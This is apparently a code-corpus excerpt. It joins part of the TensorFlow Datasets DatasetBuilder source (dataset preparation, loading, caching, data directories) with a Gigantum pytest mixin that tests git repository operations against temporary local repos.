# Maybe save the `builder_cls` metadata common to all builder configs.
if self.BUILDER_CONFIGS:
_save_default_config_name(
# `data_dir/ds_name/config/version/` -> `data_dir/ds_name/`
common_dir=self.data_path.parent.parent,
default_config_name=self.BUILDER_CONFIGS[0].name,
)
# Create a tmp dir and rename to self._data_dir on successful exit.
with utils.incomplete_dir(self._data_dir) as tmp_data_dir:
# Temporarily assign _data_dir to tmp_data_dir to avoid having to forward
# it to every sub function.
with utils.temporary_assignment(self, "_data_dir", tmp_data_dir):
if (download_config.try_download_gcs and
gcs_utils.is_dataset_on_gcs(self.info.full_name)):
logging.info(GCS_HOSTED_MSG, self.name)
gcs_utils.download_gcs_dataset(self.info.full_name, self._data_dir)
self.info.read_from_directory(self._data_dir)
else:
# Old version of TF are not os.PathLike compatible
with tf_compat.mock_gfile_pathlike():
self._download_and_prepare(
dl_manager=dl_manager,
download_config=download_config,
)
# NOTE: If modifying the lines below to put additional information in
# DatasetInfo, you'll likely also want to update
# DatasetInfo.read_from_directory to possibly restore these attributes
# when reading from package data.
# Skip statistics computation if tfdv isn't present
try:
import tensorflow_data_validation # pylint: disable=g-import-not-at-top,import-outside-toplevel,unused-import # pytype: disable=import-error
skip_stats_computation = False
except ImportError:
skip_stats_computation = True
splits = list(self.info.splits.values())
statistics_already_computed = bool(
splits and splits[0].statistics.num_examples)
# Update DatasetInfo metadata by computing statistics from the data.
if (
skip_stats_computation
or download_config.compute_stats == download.ComputeStatsMode.SKIP
or download_config.compute_stats == download.ComputeStatsMode.AUTO
and statistics_already_computed
):
pass
else: # Mode is forced or stats do not exists yet
logging.info("Computing statistics.")
self.info.compute_dynamic_properties()
self.info.download_size = dl_manager.downloaded_size
# Write DatasetInfo to disk, even if we haven't computed statistics.
self.info.write_to_directory(self._data_dir)
self._log_download_done()
def as_dataset(
self,
split=None,
*,
batch_size=None,
shuffle_files=False,
decoders=None,
read_config=None,
as_supervised=False,
):
# pylint: disable=line-too-long
"""Constructs a `tf.data.Dataset`.
Callers must pass arguments as keyword arguments.
The output types vary depending on the parameters. Examples:
```python
builder = tfds.builder('imdb_reviews')
builder.download_and_prepare()
# Default parameters: Returns the dict of tf.data.Dataset
ds_all_dict = builder.as_dataset()
assert isinstance(ds_all_dict, dict)
print(ds_all_dict.keys()) # ==> ['test', 'train', 'unsupervised']
assert isinstance(ds_all_dict['test'], tf.data.Dataset)
# Each dataset (test, train, unsup.) consists of dictionaries
# {'label': <tf.Tensor: .. dtype=int64, numpy=1>,
# 'text': <tf.Tensor: .. dtype=string, numpy=b"I've watched the movie ..">}
# {'label': <tf.Tensor: .. dtype=int64, numpy=1>,
# 'text': <tf.Tensor: .. dtype=string, numpy=b'If you love Japanese ..'>}
# With as_supervised: tf.data.Dataset only contains (feature, label) tuples
ds_all_supervised = builder.as_dataset(as_supervised=True)
assert isinstance(ds_all_supervised, dict)
print(ds_all_supervised.keys()) # ==> ['test', 'train', 'unsupervised']
assert isinstance(ds_all_supervised['test'], tf.data.Dataset)
# Each dataset (test, train, unsup.) consists of tuples (text, label)
# (<tf.Tensor: ... dtype=string, numpy=b"I've watched the movie ..">,
# <tf.Tensor: ... dtype=int64, numpy=1>)
# (<tf.Tensor: ... dtype=string, numpy=b"If you love Japanese ..">,
# <tf.Tensor: ... dtype=int64, numpy=1>)
# Same as above plus requesting a particular split
ds_test_supervised = builder.as_dataset(as_supervised=True, split='test')
assert isinstance(ds_test_supervised, tf.data.Dataset)
# The dataset consists of tuples (text, label)
# (<tf.Tensor: ... dtype=string, numpy=b"I've watched the movie ..">,
# <tf.Tensor: ... dtype=int64, numpy=1>)
# (<tf.Tensor: ... dtype=string, numpy=b"If you love Japanese ..">,
# <tf.Tensor: ... dtype=int64, numpy=1>)
```
Args:
split: Which split of the data to load (e.g. `'train'`, `'test'`,
`['train', 'test']`, `'train[80%:]'`,...). See our
[split API guide](https://www.tensorflow.org/datasets/splits).
If `None`, will return all splits in a `Dict[Split, tf.data.Dataset]`.
batch_size: `int`, batch size. Note that variable-length features will
be 0-padded if `batch_size` is set. Users that want more custom behavior
should use `batch_size=None` and use the `tf.data` API to construct a
custom pipeline. If `batch_size == -1`, will return feature
dictionaries of the whole dataset with `tf.Tensor`s instead of a
`tf.data.Dataset`.
shuffle_files: `bool`, whether to shuffle the input files. Defaults to
`False`.
decoders: Nested dict of `Decoder` objects which allow to customize the
decoding. The structure should match the feature structure, but only
customized feature keys need to be present. See
[the guide](https://github.com/tensorflow/datasets/tree/master/docs/decode.md)
for more info.
read_config: `tfds.ReadConfig`, Additional options to configure the
input pipeline (e.g. seed, num parallel reads,...).
as_supervised: `bool`, if `True`, the returned `tf.data.Dataset`
will have a 2-tuple structure `(input, label)` according to
`builder.info.supervised_keys`. If `False`, the default,
the returned `tf.data.Dataset` will have a dictionary with all the
features.
Returns:
`tf.data.Dataset`, or if `split=None`, `dict<key: tfds.Split, value:
tfds.data.Dataset>`.
If `batch_size` is -1, will return feature dictionaries containing
the entire dataset in `tf.Tensor`s instead of a `tf.data.Dataset`.
"""
# pylint: enable=line-too-long
logging.info("Constructing tf.data.Dataset for split %s, from %s",
split, self._data_dir)
if not tf.io.gfile.exists(self._data_dir):
raise AssertionError(
("Dataset %s: could not find data in %s. Please make sure to call "
"dataset_builder.download_and_prepare(), or pass download=True to "
"tfds.load() before trying to access the tf.data.Dataset object."
) % (self.name, self._data_dir_root))
# By default, return all splits
if split is None:
split = {s: s for s in self.info.splits}
read_config = read_config or read_config_lib.ReadConfig()
# Create a dataset for each of the given splits
build_single_dataset = functools.partial(
self._build_single_dataset,
shuffle_files=shuffle_files,
batch_size=batch_size,
decoders=decoders,
read_config=read_config,
as_supervised=as_supervised,
)
datasets = utils.map_nested(build_single_dataset, split, map_tuple=True)
return datasets
def _build_single_dataset(
self,
split,
shuffle_files,
batch_size,
decoders,
read_config,
as_supervised,
):
"""as_dataset for a single split."""
wants_full_dataset = batch_size == -1
if wants_full_dataset:
batch_size = self.info.splits.total_num_examples or sys.maxsize
# Build base dataset
ds = self._as_dataset(
split=split,
shuffle_files=shuffle_files,
decoders=decoders,
read_config=read_config,
)
# Auto-cache small datasets which are small enough to fit in memory.
if self._should_cache_ds(
split=split,
shuffle_files=shuffle_files,
read_config=read_config
):
ds = ds.cache()
if batch_size:
# Use padded_batch so that features with unknown shape are supported.
ds = ds.padded_batch(
batch_size, tf.compat.v1.data.get_output_shapes(ds))
if as_supervised:
if not self.info.supervised_keys:
raise ValueError(
"as_supervised=True but %s does not support a supervised "
"(input, label) structure." % self.name)
input_f, target_f = self.info.supervised_keys
ds = ds.map(lambda fs: (fs[input_f], fs[target_f]))
# Add prefetch by default
if not read_config.skip_prefetch:
ds = ds.prefetch(tf.data.experimental.AUTOTUNE)
# If shuffling is True and seeds not set, allow pipeline to be
# non-deterministic
# This code should probably be moved inside tfreader, such as
# all the tf.data.Options are centralized in a single place.
if (shuffle_files and
read_config.options.experimental_deterministic is None and
read_config.shuffle_seed is None):
options = tf.data.Options()
options.experimental_deterministic = False
ds = ds.with_options(options)
# If shuffle is False, keep the default value (deterministic), which
# allow the user to overwritte it.
if wants_full_dataset:
return tf.data.experimental.get_single_element(ds)
return ds
def _should_cache_ds(self, split, shuffle_files, read_config):
"""Returns True if TFDS should auto-cache the dataset."""
# The user can explicitly opt-out from auto-caching
if not read_config.try_autocache:
return False
# Skip datasets with unknown size.
# Even by using heuristic with `download_size` and
# `MANUAL_DOWNLOAD_INSTRUCTIONS`, it wouldn't catch datasets which hardcode
# the non-processed data-dir, nor DatasetBuilder not based on tf-record.
if not self.info.dataset_size:
return False
# Do not cache big datasets
# Instead of using the global size, we could infer the requested bytes:
# `self.info.splits[split].num_bytes`
# The info is available for full splits, and could be approximated
# for subsplits `train[:50%]`.
# However if the user is creating multiple small splits from a big
# dataset, those could adds up and fill up the entire RAM.
# 250 MiB is arbitrary picked. For comparison, Cifar10 is about 150 MiB.
if self.info.dataset_size > 250 * units.MiB:
return False
# We do not want to cache data which has more than one shards when
# shuffling is enabled, as this would effectivelly disable shuffling.
# An exception is for single shard (as shuffling is a no-op).
# Another exception is if reshuffle is disabled (shuffling already cached)
num_shards = len(self.info.splits[split].file_instructions)
if (shuffle_files and
# Shuffling only matter when reshuffle is True or None (default)
read_config.shuffle_reshuffle_each_iteration is not False and # pylint: disable=g-bool-id-comparison
num_shards > 1):
return False
# If the dataset satisfy all the right conditions, activate autocaching.
return True
def _relative_data_dir(self, with_version=True):
"""Relative path of this dataset in data_dir."""
builder_data_dir = self.name
builder_config = self._builder_config
if builder_config:
builder_data_dir = os.path.join(builder_data_dir, builder_config.name)
if not with_version:
return builder_data_dir
version_data_dir = os.path.join(builder_data_dir, str(self._version))
return version_data_dir
def _build_data_dir(self, given_data_dir):
"""Return the data directory for the current version.
Args:
given_data_dir: `Optional[str]`, root `data_dir` passed as
`__init__` argument.
Returns:
data_dir_root: `str`, The root dir containing all datasets, downloads,...
data_dir: `str`, The version data_dir
(e.g. `<data_dir_root>/<ds_name>/<config>/<version>`)
"""
builder_dir = self._relative_data_dir(with_version=False)
version_dir = self._relative_data_dir(with_version=True)
default_data_dir = constants.get_default_data_dir(
given_data_dir=given_data_dir
)
all_data_dirs = constants.list_data_dirs(given_data_dir=given_data_dir)
all_versions = set()
requested_version_dirs = {}
for data_dir_root in all_data_dirs:
# List all existing versions
full_builder_dir = os.path.join(data_dir_root, builder_dir)
data_dir_versions = set(utils.version.list_all_versions(full_builder_dir))
# Check for existance of the requested version
if self.version in data_dir_versions:
requested_version_dirs[data_dir_root] = os.path.join(
data_dir_root, version_dir
)
all_versions.update(data_dir_versions)
if len(requested_version_dirs) > 1:
raise ValueError(
"Dataset was found in more than one directory: {}. Please resolve "
"the ambiguity by explicitly specifying `data_dir=`."
"".format(requested_version_dirs.values())
)
elif len(requested_version_dirs) == 1: # The dataset is found once
return next(iter(requested_version_dirs.items()))
# No dataset found, use default directory
data_dir = os.path.join(default_data_dir, version_dir)
if all_versions:
logging.warning(
"Found a different version of the requested dataset:\n"
"%s\n"
"Using %s instead.",
"\n".join(str(v) for v in sorted(all_versions)),
data_dir
)
return default_data_dir, data_dir
def _log_download_done(self):
msg = (f"Dataset {self.name} downloaded and prepared to {self._data_dir}. "
"Subsequent calls will reuse this data.")
termcolor.cprint(msg, attrs=["bold"])
def _log_download_bytes(self):
# Print is intentional: we want this to always go to stdout so user has
# information needed to cancel download/preparation if needed.
# This comes right before the progress bar.
termcolor.cprint(
f"Downloading and preparing dataset {self.info.download_size} "
f"(download: {self.info.download_size}, "
f"generated: {self.info.dataset_size}, "
f"total: {self.info.download_size + self.info.dataset_size}) "
f"to {self._data_dir}...",
attrs=["bold"],
)
@abc.abstractmethod
@utils.docs.doc_private
def _info(self):
"""Returns the `tfds.core.DatasetInfo` object.
This function is called once and the result is cached for all
following calls.
Returns:
dataset_info: The dataset metadata.
"""
raise NotImplementedError
@abc.abstractmethod
def _download_and_prepare(self, dl_manager, download_config=None):
"""Downloads and prepares dataset for reading.
Internal implementation to overwrite when inheriting from DatasetBuilder.
Called when `builder.download_and_prepare` is called.
It should download all required data and generate
the pre-processed datasets files.
Args:
dl_manager: `tfds.download.DownloadManager` used to download and cache
data.
download_config: `DownloadConfig`, Additional options.
"""
raise NotImplementedError
@abc.abstractmethod
def _as_dataset(
self, split, decoders=None, read_config=None, shuffle_files=False):
"""Constructs a `tf.data.Dataset`.
Internal implementation to overwrite when inheriting from DatasetBuilder.
Called when `builder.as_dataset` is called.
It should read the pre-processed datasets files and generate
the `tf.data.Dataset` object.
Args:
split: `tfds.Split` which subset of the data to read.
decoders: Nested structure of `Decoder` object to customize the dataset
decoding.
read_config: `tfds.ReadConfig`
shuffle_files: `bool`, whether to shuffle the input files. Optional,
defaults to `False`.
Returns:
`tf.data.Dataset`
"""
raise NotImplementedError
def _make_download_manager(self, download_dir, download_config):
"""Creates a new download manager object."""
download_dir = (
download_dir or os.path.join(self._data_dir_root, "downloads")
)
extract_dir = (
download_config.extract_dir or os.path.join(download_dir, "extracted")
)
manual_dir = (
download_config.manual_dir or os.path.join(download_dir, "manual")
)
if download_config.register_checksums:
# Note: Error will be raised here if user try to record checksums
# from a `zipapp`
register_checksums_path = utils.to_write_path(self._checksums_path)
else:
register_checksums_path = None
return download.DownloadManager(
download_dir=download_dir,
extract_dir=extract_dir,
manual_dir=manual_dir,
url_infos=self.url_infos,
manual_dir_instructions=self.MANUAL_DOWNLOAD_INSTRUCTIONS,
force_download=(download_config.download_mode == FORCE_REDOWNLOAD),
force_extraction=(download_config.download_mode == FORCE_REDOWNLOAD),
force_checksums_validation=download_config.force_checksums_validation,
register_checksums=download_config.register_checksums,
register_checksums_path=register_checksums_path,
verify_ssl=download_config.verify_ssl,
dataset_name=self.name,
)
@property
def builder_config(self):
"""`tfds.core.BuilderConfig` for this builder."""
return self._builder_config
def _create_builder_config(self, builder_config):
"""Create and validate BuilderConfig object."""
if builder_config is None and self.BUILDER_CONFIGS:
builder_config = self.BUILDER_CONFIGS[0]
logging.info("No config specified, defaulting to first: %s/%s", self.name,
builder_config.name)
if not builder_config:
return None
if isinstance(builder_config, six.string_types):
name = builder_config
builder_config = self.builder_configs.get(name)
if builder_config is None:
raise ValueError("BuilderConfig %s not found. Available: %s" %
(name, list(self.builder_configs.keys())))
name = builder_config.name
if not name:
raise ValueError("BuilderConfig must have a name, got %s" % name)
is_custom = name not in self.builder_configs
if is_custom:
logging.warning("Using custom data configuration %s", name)
else:
if builder_config is not self.builder_configs[name]:
raise ValueError(
"Cannot name a custom BuilderConfig the same as an available "
"BuilderConfig. Change the name. Available BuilderConfigs: %s" %
(list(self.builder_configs.keys())))
return builder_config
@utils.classproperty
@classmethod
@utils.memoize()
def builder_configs(cls):
"""Pre-defined list of configurations for this builder class."""
config_dict = {config.name: config for config in cls.BUILDER_CONFIGS}
if len(config_dict) != len(cls.BUILDER_CONFIGS):
names = [config.name for config in cls.BUILDER_CONFIGS]
raise ValueError(
"Names in BUILDER_CONFIGS must not be duplicated. Got %s" % names)
return config_dict
class FileReaderBuilder(DatasetBuilder):
"""Base class for datasets reading files.
Subclasses are:
* `GeneratorBasedBuilder`: Can both generate and read generated dataset.
* `ReadOnlyBuilder`: Can only read pre-generated datasets. A user can
generate a dataset with `GeneratorBasedBuilder`, and read them with
`ReadOnlyBuilder` without requiring the original generation code.
"""
def __init__(
self,
*,
file_format: Union[
None, str,
file_adapters.FileFormat] = file_adapters.DEFAULT_FILE_FORMAT,
**kwargs: Any):
"""Initializes an instance of FileReaderBuilder.
Callers must pass arguments as keyword arguments.
Args:
file_format: EXPERIMENTAL, may change at any time; Format of the record
files in which dataset will be read/written to. Defaults to `tfrecord`.
**kwargs: Arguments passed to `DatasetBuilder`.
"""
super().__init__(**kwargs)
try:
self._file_format = file_adapters.FileFormat(file_format)
except ValueError:
all_values = [f.value for f in file_adapters.FileFormat]
raise ValueError(f"{file_format} is not a valid format. "
f"Valid file formats: {all_values}")
@utils.memoized_property
def _example_specs(self):
return self.info.features.get_serialized_info()
@property
def _tfrecords_reader(self):
return tfrecords_reader.Reader(self._data_dir, self._example_specs,
self._file_format)
def _as_dataset(
self,
split=splits_lib.Split.TRAIN,
decoders=None,
read_config=None,
shuffle_files=False,
) -> tf.data.Dataset:
decode_fn = functools.partial(
self.info.features.decode_example, decoders=decoders
)
return self._tfrecords_reader.read(
name=self.name,
instructions=split,
split_infos=self.info.splits.values(),
decode_fn=decode_fn,
read_config=read_config,
shuffle_files=shuffle_files,
)
class GeneratorBasedBuilder(FileReaderBuilder):
"""Base class for datasets with data generation based on file adapter.
`GeneratorBasedBuilder` is a convenience class that abstracts away much
of the data writing and reading of `DatasetBuilder`.
It expects subclasses to overwrite `_split_generators` to return a dict of
splits, generators. See the method docstrings for details.
"""
@abc.abstractmethod
@utils.docs.do_not_doc_in_subclasses
@utils.docs.doc_private
def _split_generators(
self,
dl_manager: download.DownloadManager,
) -> Dict[splits_lib.Split, split_builder_lib.SplitGenerator]:
"""Downloads the data and returns dataset splits with associated examples.
Example:
```python
def _split_generators(self, dl_manager):
path = dl_manager.download_and_extract('http://dataset.org/my_data.zip')
return {
'train': self._generate_examples(path=path / 'train_imgs'),
'test': self._generate_examples(path=path / 'test_imgs'),
}
```
* If the original dataset do not have predefined `train`, `test`,... splits,
this function should only returns a single `train` split here. Users can
use the [subsplit API](https://www.tensorflow.org/datasets/splits) to
create subsplits (e.g.
`tfds.load(..., split=['train[:75%]', 'train[75%:]'])`).
* `tfds.download.DownloadManager` caches downloads, so calling `download`
on the same url multiple times only download it once.
* A good practice is to download all data in this function, and have all the
computation inside `_generate_examples`.
* Splits are generated in the order defined here. `builder.info.splits` keep
the same order.
* This function can have an extra `pipeline` kwarg only if some
beam preprocessing should be shared across splits. In this case,
a dict of `beam.PCollection` should be returned.
See `_generate_example` for details.
Args:
dl_manager: `tfds.download.DownloadManager` used to download/extract the
data
Returns:
The dict of split name, generators. See `_generate_examples` for details
about the generator format.
"""
raise NotImplementedError()
@abc.abstractmethod
@utils.docs.do_not_doc_in_subclasses
@utils.docs.doc_private
def _generate_examples(
self, **kwargs: Any
) -> split_builder_lib.SplitGenerator:
"""Default function to generate examples for each split.
The function should return a collection of `(key, examples)`. Examples
will be encoded are written to disk. See `yields` section for details.
The function can return/yield:
* A python generator:
```python
def _generate_examples(self, path):
for filepath in path.iterdir():
yield filepath.name, {'image': ..., 'label': ...}
```
* A `beam.PTransform` of (input_types: [] -> output_types: `KeyExample`):
For big datasets and distributed generation. See our Apache Beam
[datasets guide](https://www.tensorflow.org/datasets/beam_datasets)
for more info.
```python
def _generate_examples(self, path):
return (
beam.Create(path.iterdir())
| beam.Map(lambda filepath: filepath.name, {'image': ..., ...})
)
```
* A `beam.PCollection`: This should only be used if you need to share some
distributed processing accross splits. In this case, you can use the
following pattern:
```python
def _split_generators(self, dl_manager, pipeline):
...
# Distributed processing shared across splits
pipeline |= beam.Create(path.iterdir())
pipeline |= 'SharedPreprocessing' >> beam.Map(_common_processing)
...
# Wrap the pipeline inside a ptransform_fn to add `'label' >> ` and avoid
# duplicated PTransform nodes names.
generate_examples = beam.ptransform_fn(self._generate_examples)
return {
'train': pipeline | 'train' >> generate_examples(is_train=True)
'test': pipeline | 'test' >> generate_examples(is_train=False)
}
def _generate_examples(self, pipeline, is_train: bool):
return pipeline | beam.Map(_split_specific_processing, is_train=is_train)
```
Note: Each split should uses a different tag name (e.g.
`'train' >> generate_examples(path)`). Otherwise Beam will raise
duplicated name error.
Args:
**kwargs: Arguments from the `_split_generators`
Yields:
key: `str` or `int`, a unique deterministic example identification key.
* Unique: An error will be raised if two examples are yield with the
same key.
* Deterministic: When generating the dataset twice, the same example
should have the same key.
Good keys can be the image id, or line number if examples are extracted
from a text file.
The key will be hashed and sorted to shuffle examples deterministically,
such as generating the dataset multiple times keep examples in the
same order.
example: `dict<str feature_name, feature_value>`, a feature dictionary
ready to be encoded and written to disk. The example will be
encoded with `self.info.features.encode_example({...})`.
"""
raise NotImplementedError()
def _download_and_prepare(
self,
dl_manager: download.DownloadManager,
download_config: download.DownloadConfig,
) -> None:
"""Generate all splits and returns the computed split infos."""
split_builder = split_builder_lib.SplitBuilder(
split_dict=self.info.splits,
features=self.info.features,
max_examples_per_split=download_config.max_examples_per_split,
beam_options=download_config.beam_options,
beam_runner=download_config.beam_runner,
file_format=self._file_format,
)
# Wrap the generation inside a context manager.
# If `beam` is used during generation (when a pipeline gets created),
# the context manager is equivalent to `with beam.Pipeline()`.
# Otherwise, this is a no-op.
# By auto-detecting Beam, the user only has to change `_generate_examples`
# to go from non-beam to beam dataset:
# https://www.tensorflow.org/datasets/beam_datasets#instructions
with split_builder.maybe_beam_pipeline():
# If the signature has a `pipeline` kwargs, create the pipeline now and
# forward it to `self._split_generators`
# We add this magic because the pipeline kwargs is only used by c4 and
# we do not want to make the API more verbose for a single advanced case.
signature = inspect.signature(self._split_generators)
if "pipeline" in signature.parameters.keys():
optional_pipeline_kwargs = dict(pipeline=split_builder.beam_pipeline)
else:
optional_pipeline_kwargs = {}
split_generators = self._split_generators( # pylint: disable=unexpected-keyword-arg
dl_manager, **optional_pipeline_kwargs
)
# TODO(tfds): Could be removed once all datasets are migrated.
# https://github.com/tensorflow/datasets/issues/2537
# Legacy mode (eventually convert list[SplitGeneratorLegacy] -> dict)
split_generators = split_builder.normalize_legacy_split_generators(
split_generators=split_generators,
generator_fn=self._generate_examples,
is_beam=isinstance(self, BeamBasedBuilder),
)
# Ensure `all` isn't used as key.
_check_split_names(split_generators.keys())
# Writer fail if the number of example yield is `0`, so we return here.
if download_config.max_examples_per_split == 0:
return
# Start generating data for all splits
path_suffix = file_adapters.ADAPTER_FOR_FORMAT[
self._file_format].FILE_SUFFIX
split_info_futures = [
split_builder.submit_split_generation( # pylint: disable=g-complex-comprehension
split_name=split_name,
generator=generator,
path=self.data_path / f"{self.name}-{split_name}.{path_suffix}",
)
for split_name, generator
in utils.tqdm(
split_generators.items(),
desc="Generating splits...",
unit=" splits",
leave=False,
)
]
# Finalize the splits (after apache beam completed, if it was used)
split_infos = [future.result() for future in split_info_futures]
# Update the info object with the splits.
split_dict = splits_lib.SplitDict(split_infos, dataset_name=self.name)
self.info.set_splits(split_dict)
@utils.docs.deprecated
class BeamBasedBuilder(GeneratorBasedBuilder):
"""Beam based Builder.
DEPRECATED: Please use `tfds.core.GeneratorBasedBuilder` instead.
"""
def _generate_examples(
self, *args: Any, **kwargs: Any
) -> split_builder_lib.SplitGenerator:
return self._build_pcollection(*args, **kwargs)
def _check_split_names(split_names: Iterable[str]) -> None:
"""Check that split names are valid."""
if "all" in set(str(s).lower() for s in split_names):
raise ValueError(
"`all` is a reserved keyword. Split cannot be named like this."
)
def _save_default_config_name(
common_dir: ReadWritePath,
*,
default_config_name: str,
) -> None:
"""Saves `builder_cls` metadata (common to all builder configs)."""
data = {
"default_config_name": default_config_name,
}
# `data_dir/ds_name/config/version/` -> `data_dir/ds_name/.config`
config_dir = common_dir / ".config"
config_dir.mkdir(parents=True, exist_ok=True)
# Note:
# * Save inside a dir to support some replicated filesystem
# * Write inside a `.incomplete` file and rename to avoid multiple configs
# writing concurently the same file
# * Config file is overwritten each time a config is generated. If the
# default config is changed, this will be updated.
config_path = config_dir / "metadata.json"
with utils.incomplete_file(config_path) as tmp_config_path:
tmp_config_path.write_text(json.dumps(data))
def load_default_config_name(
common_dir: ReadOnlyPath,
) -> Optional[str]:
"""Load `builder_cls` metadata (common to all builder configs)."""
config_path = common_dir / ".config/metadata.json"
if not config_path.exists():
return None
data = json.loads(config_path.read_text())
return data.get("default_config_name")
| 39.223821
| 154
| 0.691129
|
56ca498cec1c047b8bf0f3c8e3b13290e6207c10
| 57,029
|
py
|
Python
|
packages/gtmcore/gtmcore/gitlib/tests/git_interface_mixin.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
packages/gtmcore/gtmcore/gitlib/tests/git_interface_mixin.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
packages/gtmcore/gtmcore/gitlib/tests/git_interface_mixin.py
|
jjwatts/gigantum-client
|
88ce0475fb6880322bdd06d987c494e29064f278
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2017 FlashX, LLC
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import pytest
from typing import Any
import tempfile
import os
import shutil
import uuid
import datetime
from gtmcore.gitlib import GitFilesystem, GitFilesystemShimmed, GitAuthor
from git import Repo
from git.exc import GitCommandError
def get_backend():
return os.environ['GITLIB_FS_BACKEND']
def get_fs_class():
if get_backend() == 'filesystem':
return GitFilesystem
elif get_backend() == 'filesystem-shim':
return GitFilesystemShimmed
else:
raise NotImplementedError('Invalid FS class')
# Required Fixtures:
# - mock_config: a standard config with an empty working dir
# - mock_initialized: a gitlib instance initialized with an empty repo
# - mock_initialized_remote: a gitlib instance initialized with an empty repo and create bare repo
# GitFilesystem Fixtures
@pytest.fixture()
def mock_config_filesystem():
# Create temporary working directory
working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(working_dir)
config = {"backend": get_backend(), "working_directory": working_dir}
yield config # provide the fixture value
# Force delete the directory
shutil.rmtree(working_dir)
@pytest.fixture()
def mock_initialized_filesystem():
"""Create an initialized git lib instance
Returns:
(gitlib.git.GitRepoInterface, str): the instance, the working dir
"""
# Create temporary working directory
working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(working_dir)
config = {"backend": get_backend(), "working_directory": working_dir}
# Init the empty repo
create_dummy_repo(working_dir)
git = get_fs_class()(config)
yield git, working_dir # provide the fixture value
# Force delete the directory
shutil.rmtree(working_dir)
@pytest.fixture()
def mock_initialized_filesystem_with_remote():
"""Create an initialized git lib instance and also create a bare initialized repo
returns a clone of the repo on master, the working dir for that repo, the bare repo, and the working bare dir
Returns:
(gitlib.git.GitRepoInterface, str, gitlib.git.GitRepoInterface, str)
"""
# Create temporary working directory for the bare repo
bare_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(bare_working_dir)
bare_repo = Repo.init(bare_working_dir, bare=True)
populate_bare_repo(bare_working_dir)
# Create temporary working directory
working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(working_dir)
config = {"backend": get_backend(), "working_directory": working_dir}
# Init the empty repo
git = get_fs_class()(config)
git.clone(bare_working_dir)
yield git, working_dir, bare_repo, bare_working_dir # provide the fixture value
# Force delete the directory
shutil.rmtree(bare_working_dir)
shutil.rmtree(working_dir)
def populate_bare_repo(working_dir):
"""Method to populate the bare repo with a branch, files, and tag"""
# Create a local repo so we can manipulate the remote
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
# Init the empty repo
git = get_fs_class()(config)
git.clone(working_dir)
# Add a file to master and commit
write_file(git, "test1.txt", "Original Content", commit_msg="initial commit")
git.repo.remotes.origin.push()
# Create a branch from master
new_branch = git.repo.create_head("test_branch", git.repo.refs.master)
git.repo.head.set_reference(new_branch)
write_file(git, "test2.txt", "Original Content", commit_msg="second commit")
git.repo.remotes.origin.push("test_branch")
# Tag
tag = git.repo.create_tag("test_tag_1", message="a test tag")
git.repo.remotes.origin.push(tag)
# Check master back out
git.repo.heads.master.checkout()
# Delete temp dir
shutil.rmtree(scratch_working_dir)
def create_dummy_repo(working_dir):
"""Helper method to create a dummy repo with a file in it"""
filename = "dummy.txt"
repo = Repo.init(working_dir)
with open(os.path.join(working_dir, filename), 'wt') as dt:
dt.write("entry 1")
repo.index.add([os.path.join(working_dir, filename)])
repo.index.commit("initial commit")
def write_file(git_instance, filename, content, add=True, commit_msg=None):
"""Write content to a file
Args:
filename(str): The relative file path from the working dir
content(str): What to write
add(bool): If true, ddd to git repo
commit_msg (str): If not none, commit file with this message
Returns:
"""
working_dir = git_instance.config["working_directory"]
with open(os.path.join(working_dir, filename), 'wt') as dt:
dt.write(content)
if add:
git_instance.add(os.path.join(working_dir, filename))
if commit_msg:
git_instance.commit(commit_msg)
class GitInterfaceMixin(object):
"""Mixin to test the GitInterface"""
class_type: Any = None
def get_git_obj(self, config):
raise NotImplemented
def test_empty_dir(self, mock_config):
"""Test trying to get the filesystem interface"""
git = self.get_git_obj(mock_config)
assert type(git) is self.class_type
assert git.repo is None
def test_existing_repo(self, mock_config):
"""Test trying to load an existing repo dir"""
# Create a repo in the working dir
create_dummy_repo(mock_config["working_directory"])
# Create a GitFilesystem instance
git = self.get_git_obj(mock_config)
assert type(git) is self.class_type
assert type(git.repo) is Repo
def test_update_working_directory(self, mock_config):
"""Test trying to load an existing repo dir"""
# Create a repo in the working dir
create_dummy_repo(mock_config["working_directory"])
# Create a GitFilesystem instance
git = self.get_git_obj(mock_config)
assert type(git) is self.class_type
assert type(git.repo) is Repo
assert git.working_directory == mock_config["working_directory"]
new_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(new_working_dir)
git.set_working_directory(new_working_dir)
assert git.repo is None
assert git.working_directory == new_working_dir
git.initialize()
assert type(git.repo) is Repo
shutil.rmtree(new_working_dir)
def test_clone_repo(self, mock_initialized_remote):
"""Test trying to clone an existing repo dir"""
scratch_working_dir = os.path.join(tempfile.gettempdir(), uuid.uuid4().hex)
os.makedirs(scratch_working_dir)
config = {"backend": get_backend(), "working_directory": scratch_working_dir}
git = self.get_git_obj(config)
git.clone(mock_initialized_remote[3])
assert len(git.repo.heads) == 1
assert len(git.repo.remotes["origin"].fetch()) == 2
assert len(git.repo.refs) == 5
